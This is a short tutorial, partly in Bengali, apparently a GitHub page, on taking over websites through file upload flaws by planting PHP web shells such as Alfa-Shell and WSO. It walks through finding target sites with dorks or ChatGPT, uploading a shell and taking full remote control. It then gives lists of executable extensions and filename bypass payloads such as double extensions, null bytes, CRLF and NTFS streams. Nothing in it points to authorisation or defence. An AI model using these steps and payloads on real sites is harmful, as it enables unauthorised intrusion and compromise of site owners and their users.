ফাইল আপলোড Vulnerability/shall upload হল যখন একটি ওয়েব সার্ভার ব্যবহারকারীদের তাদের নাম, প্রকার, বিষয়বস্তু বা আকারের মতো পর্যাপ্ত পরিমাণে যাচাই না করেই তার ফাইল সিস্টেমে ফাইল আপলোড করার অনুমতি দেয়৷
এই ফাইল আপলোড এর উপর উপর সঠিকভাবে Restriction প্রয়োগ করতে না পারলে ওয়েবসাইটের file-upload ভারিয়াবিলিটি ব্যবহার করে ডাটা টেম্পারিং করে যে কেউ যেকোনো ধরনের ফাইল ওয়েবসাইটে আপলোড করে দিতে পারে এবং বিভিন্ন ধরনের server-side script files এর মাধ্যমে যে কেউ ওয়েবসাইটের রিমোট এক্সেস নিয়ে নিতে পারে৷
Step-1: Download my shall
| Name | Language | File |
|---|---|---|
| Alfa-Shell | php | Download |
| gel4y | php | Download |
| wso | php | Download |
Step-2: Search vulnerable website or your taget website. For searching vulnerable website you can use chatgpt or google dork
Step-3: Find file upload option in your target website or vulnerable website. And need any File upload option for upload shell.
Image demo:.png)
Step-4: Now upload shell in here and open uploaded directory
.png)
Example:
If you upload a websites such as: https://example.com and youf file name shell.php then your directory is https://example.com/shell.php Thus can you find your Directory.
Step-5: Open your directory and you will see a shell. now you can full control your target website from here 😊
If file don’t be upload follow instructions that given below:
1.File Upload Bypass:
File Upload General Methodology:
Other useful extensions:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
2.Bypass file extensions checks:
1) If they apply, the check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr ..
2) Check adding a valid extension before the execution extension (use previous extensions also):
file.png.php
file.png.Php5
3) Try adding special characters at the end. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously motioned extensions)
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5...
4) Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
5) Add another layer of extensions to the previous check:
file.png.jpg.php
file.php%00.png%00.jpg
6) Try to put the exec extension before the valid extension and pray so the server is misconfigured. **(useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php** will execute code):
ex: file.php.png
7) Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “::$data” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
3.video demo:
Github:https://github.com/TheBwof/web-shell
Thank you so much for reading 😊